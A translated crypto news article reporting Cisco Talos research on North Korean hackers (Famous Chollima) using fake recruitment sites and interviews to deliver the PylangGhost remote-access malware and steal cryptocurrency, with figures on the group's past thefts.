North Korean hackers attack through cryptocurrency using sophisticated phishing campaigns
North Korean hackers, known prominently as Famous Chollima, have targeted cryptocurrency experts with phishing attacks via fake recruitment websites. The goal is to gather authentic data and install malware on victims' devices. This malware has compromised access from more than 80 browser extensions, including cryptocurrency wallets like Metamask, TronLink, MultiverseX, as well as passphrase managers like 1Password, NordPass.
Attack methods through fake recruitment websites
Cisco Talos research indicates that the hacker group impersonates reputable companies like Coinbase, Uniswap, Robinhood to redirect victims to fake skill assessment websites. Here, victims are forced to enter personal information and answer technical questions that lead to data breaches or download malware to their devices. These cases mainly occur in India, according to analysis from open sources.
Clear links to the North Korean hacker group
Cisco Talos confirms a new Python-based malware, named 'PylangGhost', linked to the hacker group identifying itself as Famous Chollima, also known as 'Wagemole'. This malware has remote control capabilities, equivalent to many functions of the earlier GolangGhost variant, focusing on attacking Windows systems. The activities of this group began in 2024, through a series of campaigns launching fake recruitment ads and sophisticated skill assessment sites.
Phishing attack campaign through fake interviews
In the latest campaign, candidates were required to enable camera access during video interviews and execute malicious commands. The file 'nvidia.py' will launch a RAT, create a registry value, connect to the command and control server (C2), and establish a command loop. These commands are customized according to the browser and operating system, such as PowerShell, Bash, or Command Shell, to optimize remote control capabilities.
The impact of the North Korean hacker group on the global cryptocurrency market
In addition to directly stealing from exchanges, these hackers also target crypto experts to gather strategic information and infiltrate cryptocurrency companies. In early 2024, the North Korean hacker group used fake companies like BlockNovas LLC and SoftGlide LLC to spread malware through fake interviews before the FBI seized these domains.
North Korea's role in sophisticated attack schemes
In December 2024, the North Korean hacker group attacked by sending malware-infected PDF files to engineers, aiming to implant malicious code and steal $50 million through unauthorized withdrawals at Radiant Capital. The governments of Japan, South Korea, and the United States confirmed that groups like Lazarus have stolen at least $659 million through a series of cryptocurrency breaches in 2024. The activities of these 'terrorist' engineers are a logistical funding source for the regime's weapons program.
Data and Predictions on North Korean hacker attack activities
Chainalysis analyst Erin Plante asserts that the North Korean hacker group is the most active online attacking force in the cryptocurrency sector. In 2022, this group stole an estimated $1.7 billion in cryptocurrency from breaches, doubling from $428.8 million in 2021. Notably, exchanges like Kraken also identified and successfully prevented a cooperating employee from North Korea during the online recruitment process.
Source: https://tintucbitcoin.com/tan-cong-trieu-tien-qua-tuyen-dung-tien-so/
Thank you for reading this article!
Please Like, Comment, and Follow TinTucBitcoin to stay updated on the latest news about the cryptocurrency market and not miss any important information!
